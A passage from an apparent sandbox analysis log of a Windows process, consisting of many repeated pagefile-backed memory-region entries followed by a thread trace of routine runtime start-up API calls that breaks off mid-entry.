0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15471 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15472 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15473 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15474 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15475 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15476 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15477 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15478 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15479 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15480 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15481 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15482 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15483 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15484 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15485 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15486 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15487 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15488 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15489 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15490 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15491 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15492 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15493 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15494 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15495 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15496 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15497 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15498 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15499 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15500 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15501 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15502 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15503 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15504 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15505 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15506 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15507 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15508 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15509 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15510 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15511 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15512 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15513 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15514 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15515 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15516 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15517 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15518 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15519 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15520 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15521 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15522 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15523 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15524 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15525 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15526 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15527 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15528 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15529 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15530 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15531 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15532 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15533 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15534 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15535 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15536 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15537 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15538 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15539 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15540 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15541 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15542 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15543 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15544 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15545 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15546 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15547 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15548 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15549 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15550 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15551 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15552 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15553 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15554 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15555 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15556 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15557 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15558 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15559 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15560 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15561 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15562 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15563 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15564 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15565 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15566 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15567 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15568 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15569 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15570 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15571 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15572 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15573 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15574 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15575 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15576 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15577 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15578 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15579 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15580 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15581 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15582 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15583 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15584 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15585 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15586 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15587 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15588 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15589 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15590 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15591 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15592 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15593 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15594 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15595 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15596 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15597 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15598 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15599 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15600 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15601 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15602 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15603 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15604 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15605 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15606 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15607 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15608 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15609 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15610 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15611 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15612 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15613 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15614 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15615 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15616 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15617 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15618 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15619 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15620 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15621 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15622 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15623 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15624 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15625 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15626 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15627 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15628 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15629 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15630 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15631 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15632 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15633 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15634 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15635 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Thread: id = 219 os_tid = 0x4cc [0251.529] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.529] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0251.529] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.529] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0251.529] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0251.530] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.530] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0251.530] GetProcessHeap () returned 0x400000 [0251.530] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.530] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0251.530] GetLastError () returned 0x7e [0251.530] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0251.530] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0251.531] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c8) returned 0x40c320 [0251.531] SetLastError (dwErrCode=0x7e) [0251.531] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1200) returned 0x413470 [0251.532] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", 